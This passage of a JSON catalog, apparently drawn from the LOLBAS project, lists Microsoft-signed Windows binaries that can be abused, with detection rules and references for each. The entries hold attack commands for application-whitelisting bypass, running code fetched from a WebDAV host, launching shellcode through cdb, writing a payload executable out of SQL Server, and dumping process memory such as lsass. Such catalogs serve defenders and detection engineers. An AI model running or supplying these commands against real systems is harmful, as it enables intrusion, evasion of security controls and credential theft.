Office\\root\\client\\appvlp.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_appvlp.yml"}],"references":["https://github.com/MoooKitty/Code-Execution","https://twitter.com/moo_hax/status/892388990686347264","https://enigma0x3.net/2018/06/11/the-tale-of-settingcontent-ms-files/","https://securityboulevard.com/2018/07/attackers-test-new-document-attack-vector-that-slips-past-office-defenses/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Appvlp/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:appvlp-exe:1","toolId":"lolbas:appvlp-exe","toolName":"Appvlp.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"AppVLP.exe powershell.exe -c \"$e=New-Object -ComObject shell.application;$e.ShellExecute('{PATH:.exe}','', '', 'open', 1)\"","description":"Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.","usecase":"Local execution of process bypassing Attack Surface Reduction (ASR).","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft Office\\root\\client\\appvlp.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\client\\appvlp.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_appvlp.yml"}],"references":["https://github.com/MoooKitty/Code-Execution","https://twitter.com/moo_hax/status/892388990686347264","https://enigma0x3.net/2018/06/11/the-tale-of-settingcontent-ms-files/","https://securityboulevard.com/2018/07/attackers-test-new-document-attack-vector-that-slips-past-office-defenses/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Appvlp/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:bcp-exe:0","toolId":"lolbas:bcp-exe","toolName":"Bcp.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"bcp \"SELECT payload_data FROM database.dbo.payloads WHERE id=1\" queryout \"C:\\Windows\\Temp\\payload.exe\" -S localhost -T -c","description":"Export binary payload stored in SQL Server database to file system.","usecase":"Extract malicious executable from database storage to local file system for execution.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft SQL Server\\Client SDK\\ODBC\\170\\Tools\\Binn\\bcp.exe","C:\\Program Files\\Microsoft SQL Server\\Client SDK\\ODBC\\130\\Tools\\Binn\\bcp.exe","C:\\Program Files\\Microsoft SQL Server\\Client SDK\\ODBC\\110\\Tools\\Binn\\bcp.exe","C:\\Program Files (x86)\\Microsoft SQL Server\\Client SDK\\ODBC\\170\\Tools\\Binn\\bcp.exe","C:\\Program Files (x86)\\Microsoft SQL Server\\Client SDK\\ODBC\\130\\Tools\\Binn\\bcp.exe","C:\\Program Files (x86)\\Microsoft SQL Server\\Client SDK\\ODBC\\110\\Tools\\Binn\\bcp.exe","C:\\Program Files (x86)\\Microsoft SQL Server\\120\\Tools\\Binn\\bcp.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"Process creation of bcp.exe with queryout or Out parameter"},{"type":"IOC","value":"bcp.exe writing executable files to temp or users directories"},{"type":"IOC","value":"Network connections from bcp.exe to SQL Server followed by file creation"},{"type":"IOC","value":"Event ID 4688 - Process creation for bcp.exe"},{"type":"IOC","value":"Event ID 4663 - File system access by bcp.exe"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_bcp_export_data.yml"}],"references":["https://docs.microsoft.com/en-us/sql/tools/bcp-utility","https://asec.ahnlab.com/en/61000/","https://asec.ahnlab.com/en/78944/","https://www.huntress.com/blog/attacking-mssql-servers","https://www.huntress.com/blog/attacking-mssql-servers-pt-ii","https://news.sophos.com/en-us/2024/08/07/sophos-mdr-hunt-tracks-mimic-ransomware-campaign-against-organizations-in-india/","https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bcp/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:bginfo-exe:0","toolId":"lolbas:bginfo-exe","toolName":"Bginfo.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"bginfo.exe {PATH:.bgi} /popup /nolicprompt","description":"Execute VBscript code that is referenced within the specified .bgi file.","usecase":"Local execution of VBScript","mitre":["T1218"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_bginfo.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"}],"references":["https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:bginfo-exe:1","toolId":"lolbas:bginfo-exe","toolName":"Bginfo.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"bginfo.exe {PATH:.bgi} /popup /nolicprompt","description":"Execute VBscript code that is referenced within the specified .bgi file.","usecase":"Local execution of VBScript","mitre":["T1218"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_bginfo.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"}],"references":["https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:bginfo-exe:2","toolId":"lolbas:bginfo-exe","toolName":"Bginfo.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"\\\\10.10.10.10\\webdav\\bginfo.exe {PATH:.bgi} /popup /nolicprompt","description":"Execute bginfo.exe from a WebDAV server.","usecase":"Remote execution of VBScript","mitre":["T1218"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_bginfo.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"}],"references":["https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:bginfo-exe:3","toolId":"lolbas:bginfo-exe","toolName":"Bginfo.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"\\\\10.10.10.10\\webdav\\bginfo.exe {PATH:.bgi} /popup /nolicprompt","description":"Execute bginfo.exe from a WebDAV server.","usecase":"Remote execution of VBScript","mitre":["T1218"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_bginfo.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"}],"references":["https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:bginfo-exe:4","toolId":"lolbas:bginfo-exe","toolName":"Bginfo.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"\\\\live.sysinternals.com\\Tools\\bginfo.exe {PATH_SMB:.bgi} /popup /nolicprompt","description":"This style of execution may not longer work due to patch.","usecase":"Remote execution of VBScript","mitre":["T1218"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_bginfo.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"}],"references":["https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:bginfo-exe:5","toolId":"lolbas:bginfo-exe","toolName":"Bginfo.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"\\\\live.sysinternals.com\\Tools\\bginfo.exe {PATH_SMB:.bgi} /popup /nolicprompt","description":"This style of execution may not longer work due to patch.","usecase":"Remote execution of VBScript","mitre":["T1218"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_bginfo.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"}],"references":["https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:cdb-exe:0","toolId":"lolbas:cdb-exe","toolName":"Cdb.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"cdb.exe -cf {PATH:.wds} -o notepad.exe","description":"Launch 64-bit shellcode from the specified .wds file using cdb.exe.","usecase":"Local execution of assembly shellcode.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\cdb.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\cdb.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_cdb.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"}],"references":["http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html","https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options","https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda","https://mrd0x.com/the-power-of-cdb-debugging-tool/","https://twitter.com/nas_bench/status/1534957360032120833","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:cdb-exe:1","toolId":"lolbas:cdb-exe","toolName":"Cdb.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"cdb.exe -pd -pn {process_name}\n.shell {CMD}","description":"Attaching to any process and executing shell commands.","usecase":"Run a shell command under a trusted Microsoft signed binary","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\cdb.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\cdb.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_cdb.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"}],"references":["http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html","https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options","https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda","https://mrd0x.com/the-power-of-cdb-debugging-tool/","https://twitter.com/nas_bench/status/1534957360032120833","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:cdb-exe:2","toolId":"lolbas:cdb-exe","toolName":"Cdb.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"cdb.exe -c {PATH:.txt} \"{CMD}\"","description":"Execute arbitrary commands and binaries using a debugging script (see Resources section for a sample file).","usecase":"Run commands under a trusted Microsoft signed binary","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\cdb.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\cdb.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_cdb.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"}],"references":["http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html","https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options","https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda","https://mrd0x.com/the-power-of-cdb-debugging-tool/","https://twitter.com/nas_bench/status/1534957360032120833","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:coregen-exe:0","toolId":"lolbas:coregen-exe","toolName":"coregen.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"coregen.exe /L {PATH_ABSOLUTE:.dll} dummy_assembly_name","description":"Loads the target .DLL in arbitrary path specified with /L.","usecase":"Execute DLL code","mitre":["T1055"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft Silverlight\\5.1.50918.0\\coregen.exe","C:\\Program Files (x86)\\Microsoft Silverlight\\5.1.50918.0\\coregen.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/image_load/image_load_side_load_coregen.yml"},{"type":"IOC","value":"coregen.exe loading .dll file not in \"C:\\Program Files (x86)\\Microsoft Silverlight\\5.1.50918.0\\\""},{"type":"IOC","value":"coregen.exe loading .dll file not named coreclr.dll"},{"type":"IOC","value":"coregen.exe command line containing -L or -l"},{"type":"IOC","value":"coregen.exe command line containing unexpected/invald assembly name"},{"type":"IOC","value":"coregen.exe application crash by invalid assembly name"}],"references":["https://www.youtube.com/watch?v=75XImxOOInU","https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html","https://lolbas-project.github.io/lolbas/OtherMSBinaries/coregen/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:coregen-exe:1","toolId":"lolbas:coregen-exe","toolName":"coregen.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"coregen.exe dummy_assembly_name","description":"Loads the coreclr.dll in the corgen.exe directory (e.g. C:\\Program Files\\Microsoft Silverlight\\5.1.50918.0).","usecase":"Execute DLL code","mitre":["T1055"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft Silverlight\\5.1.50918.0\\coregen.exe","C:\\Program Files (x86)\\Microsoft Silverlight\\5.1.50918.0\\coregen.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/image_load/image_load_side_load_coregen.yml"},{"type":"IOC","value":"coregen.exe loading .dll file not in \"C:\\Program Files (x86)\\Microsoft Silverlight\\5.1.50918.0\\\""},{"type":"IOC","value":"coregen.exe loading .dll file not named coreclr.dll"},{"type":"IOC","value":"coregen.exe command line containing -L or -l"},{"type":"IOC","value":"coregen.exe command line containing unexpected/invald assembly name"},{"type":"IOC","value":"coregen.exe application crash by invalid assembly name"}],"references":["https://www.youtube.com/watch?v=75XImxOOInU","https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html","https://lolbas-project.github.io/lolbas/OtherMSBinaries/coregen/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:coregen-exe:2","toolId":"lolbas:coregen-exe","toolName":"coregen.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"coregen.exe /L {PATH_ABSOLUTE:.dll} dummy_assembly_name","description":"Loads the target .DLL in arbitrary path specified with /L. Since binary is signed it can also be used to bypass application whitelisting solutions.","usecase":"Execute DLL code","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft Silverlight\\5.1.50918.0\\coregen.exe","C:\\Program Files (x86)\\Microsoft Silverlight\\5.1.50918.0\\coregen.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/image_load/image_load_side_load_coregen.yml"},{"type":"IOC","value":"coregen.exe loading .dll file not in \"C:\\Program Files (x86)\\Microsoft Silverlight\\5.1.50918.0\\\""},{"type":"IOC","value":"coregen.exe loading .dll file not named coreclr.dll"},{"type":"IOC","value":"coregen.exe command line containing -L or -l"},{"type":"IOC","value":"coregen.exe command line containing unexpected/invald assembly name"},{"type":"IOC","value":"coregen.exe application crash by invalid assembly name"}],"references":["https://www.youtube.com/watch?v=75XImxOOInU","https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html","https://lolbas-project.github.io/lolbas/OtherMSBinaries/coregen/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:createdump-exe:0","toolId":"lolbas:createdump-exe","toolName":"Createdump.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"createdump.exe -n -f {PATH:.dmp} {PID}","description":"Dump process by PID and create a minidump file. If \"-f dump.dmp\" is not specified, the file is created as '%TEMP%\\dump.%p.dmp' where %p is the PID of the target process.","usecase":"Dump process memory contents using PID.","mitre":["T1003"],"privilege":"system","fullPath":["C:\\Program Files\\dotnet\\shared\\Microsoft.NETCore.App\\<version>\\createdump.exe","C:\\Program Files (x86)\\dotnet\\shared\\Microsoft.NETCore.App\\<version>\\createdump.exe","C:\\Program Files\\Microsoft Visual Studio\\<version>\\Community\\dotnet\\runtime\\shared\\Microsoft.NETCore.App\\6.0.0\\createdump.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\<version>\\Community\\dotnet\\runtime\\shared\\Microsoft.NETCore.App\\6.0.0\\createdump.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_proc_dump_createdump.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_renamed_createdump.yml"},{"type":"IOC","value":"createdump.exe process with a command line containing the lsass.exe process id"}],"references":["https://twitter.com/bopin2020/status/1366400799199272960","https://docs.microsoft.com/en-us/troubleshoot/developer/webapps/aspnetcore/practice-troubleshoot-linux/lab-1-3-capture-core-crash-dumps","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Createdump/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:csi-exe:0","toolId":"lolbas:csi-exe","toolName":"csi.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"csi.exe {PATH:.cs}","description":"Use csi.exe to run unsigned C# code.","usecase":"Local execution of unsigned C# code.","mitre":["T1127"],"privilege":"user","fullPath":["c:\\Program Files (x86)\\Microsoft Visual Studio\\2017\\Community\\MSBuild\\15.0\\Bin\\Roslyn\\csi.exe","c:\\Program Files (x86)\\Microsoft Web Tools\\Packages\\Microsoft.Net.Compilers.X.Y.Z\\tools\\csi.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_csi_execution.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_csi_use_of_csharp_console.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"}],"references":["https://twitter.com/subTee/status/781208810723549188","https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/csi/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:defaultpack-exe:0","toolId":"lolbas:defaultpack-exe","toolName":"DefaultPack.EXE","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"DefaultPack.EXE /C:\"{CMD}\"","description":"Use DefaultPack.EXE to execute arbitrary binaries, with added argument support.","usecase":"Can be used to execute stagers, binaries, and other malicious commands.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft\\DefaultPack\\DefaultPack.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_lolbin_defaultpack.yml"},{"type":"IOC","value":"DefaultPack.EXE spawned an unknown process"}],"references":["https://twitter.com/checkymander/status/1311509470275604480.","https://lolbas-project.github.io/lolbas/OtherMSBinaries/DefaultPack/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:devinit-exe:0","toolId":"lolbas:devinit-exe","toolName":"Devinit.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"devinit.exe run -t msi-install -i {REMOTEURL:.msi}","description":"Downloads an MSI file to C:\\Windows\\Installer and then installs it.","usecase":"Executes code from a (remote) MSI file.","mitre":["T1218.007"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft Visual Studio\\<version>\\Community\\Common7\\Tools\\devinit\\devinit.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\<version>\\Community\\Common7\\Tools\\devinit\\devinit.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_devinit_lolbin_usage.yml"}],"references":["https://twitter.com/mrd0x/status/1460815932402679809","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devinit/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:devtoolslauncher-exe:0","toolId":"lolbas:devtoolslauncher-exe","toolName":"Devtoolslauncher.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"devtoolslauncher.exe LaunchForDeploy {PATH_ABSOLUTE:.exe} \"{CMD:args}\" test","description":"The above binary will execute other binary.","usecase":"Execute any binary with given arguments and it will call `developertoolssvc.exe`. `developertoolssvc` is actually executing the binary.","mitre":["T1127"],"privilege":"user","fullPath":["c:\\windows\\system32\\devtoolslauncher.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_devtoolslauncher.yml"},{"type":"IOC","value":"DeveloperToolsSvc.exe spawned an unknown process"}],"references":["https://twitter.com/_felamos/status/1179811992841797632","https://www.virustotal.com/gui/file/84877a507af8b70c145777a87eaf28a8327c50a1563fe650f34572bef8a42ff6/details","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devtoolslauncher/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream 